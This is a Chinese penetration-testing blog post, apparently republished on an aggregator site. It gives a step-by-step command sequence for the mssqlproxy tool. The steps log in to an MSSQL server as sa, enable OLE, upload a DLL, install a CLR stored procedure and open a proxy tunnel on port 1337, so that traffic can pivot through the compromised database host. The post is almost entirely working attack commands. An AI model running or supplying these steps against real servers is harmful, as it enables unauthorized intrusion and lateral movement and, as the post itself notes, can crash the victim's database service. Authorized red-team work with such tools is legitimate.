相关文章推荐
小百科  ›  mssql隧道 - Welcome to Security WorldWelcome to Security World
mssql
博学的火锅
11 月前
> 渗透测试 > mssql隧道

mssql隧道

渗透测试 lz520520 3年前 (2020-10-10) 1051次浏览

https://github.com/blackarrowsec/mssqlproxy

# 连接mssql
python mssqlclient.py sa:[email protected]
# 启用ole
enable_ole
# 上传reciclador.dll
upload reciclador.dll c:\programdata\reciclador.dll
# 开启clr,注册存储过程Microsoft.SqlServer.Proxy
python mssqlclient.py sa:[email protected] -install -clr Microsoft.SqlServer.Proxy.dll
# 检查CLR已准备好
python mssqlclient.py sa:[email protected] -check -reciclador c:\programdata\reciclador.dll
# 开启代理,默认为TCP 1337,可通过-local-port设置
python mssqlclient.py sa:[email protected] -start -reciclador c:\programdata\reciclador.dll

PS:
1. 如果通过代理访问,需要设置-no-check-src-port
2. 仅支持IPv4
3. 并发过高会导致mssql服务crash
4. 关闭代理请使用ctrl+C,否则可能导致服务器crash

Security , 版权所有丨如未注明 , 均为原创丨
转载请注明原文链接: mssql隧道
喜欢 ( 15 )

  • 版权声明

    本站的文章和资源来自互联网或者站长
    的原创,按照 CC BY -NC -SA 3.0 CN
    协议发布和共享,转载或引用本站文章
    应遵循相同协议。如果有侵犯版权的资
    源请尽快联系站长,我们会在24h内删
    除有争议的资源。

  • 友情链接

    yodidi.github.io

Copyright © 2018-2022 lz520520 Blog
 
推荐文章
Link管理   ·   51好读   ·   Sov5搜索   ·   小百科
小百科 - 百科知识指南